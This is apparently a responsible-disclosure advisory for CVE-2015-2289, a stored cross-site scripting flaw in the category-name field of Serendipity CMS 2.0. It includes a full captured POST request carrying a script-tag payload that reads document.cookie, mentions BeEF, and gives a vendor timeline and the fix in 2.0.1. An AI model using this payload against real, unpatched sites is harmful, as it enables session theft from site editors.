[CVE-2015-2289] Serendipity CMS – XSS Vulnerability in Version 2.0 • Edric Teo

[CVE-2015-2289] Serendipity CMS – XSS Vulnerability in Version 2.0

March 2015

Serendipity CMS – XSS Vulnerability in Version 2.0

Product Information:

Software: Serendipity CMS

Tested Version: 2.0, released 23.1.2015

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: http://www.s9y.org/12.html

Description: Serendipity is aimed to make everything possible you ever wish for. It is technically up to par to other well-known weblog scripts like Moveable Type or WordPress. (copied from http://www.s9y.org/3.html)

Vulnerability description:

XSS is found in category creation page. When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:

POST /serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 394
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: serendipity[old_session]=q8jagkbn03i41p1hea1vp3mqi7; serendipity[author_token]=906de2dd7201b75f1f710f59128e1ffb5cec6cf4; serendipity[userDefLang]=en; serendipity[toggle_extended]=true; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=; serendipity[sortorder_order]=; serendipity[sortorder_ordermode]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_f857b4bc988a333c379a2d9bd477dd65=q8jagkbn03i41p1hea1vp3mqi7

serendipity%5Btoken%5D=b95339bd8490707038719715c6d58e63&serendipity%5Bcat%5D%5Bname%5D=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&serendipity%5Bcat%5D%5Bdescription%5D=&serendipity%5Bcat%5D%5Bparent_cat%5D=0&serendipity%5Bcat%5D%5Bhide_sub%5D=0&serendipity%5Bcat%5D%5Bread_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bwrite_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bicon%5D=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS. The payload is executed when an authenticated user navigates to the “New Entry” page.

Impact:

An attacker is able to leverage on the XSS vulnerability to exploit the content creator of Serendipity CMS. An example would be to inject malicious JavaScript code in order to use attacking tools like BeEF.

Solution: Update to the latest version, which is 2.0.1, see http://blog.s9y.org/archives/263-Serendipity-2.0.1-released.html

Timeline:

Vulnerability found: 12.3.2015

Vendor informed: 12.3.2015

Response by vendor: 12.3.2015

Fix by vendor 12.3.2015

Public Advisory: 13.3.2015

Reference: https://github.com/s9y/Serendipity/commit/a30886d3bb9d8eeb6698948864c77caaa982435d

This advisory is also available on securityfocus.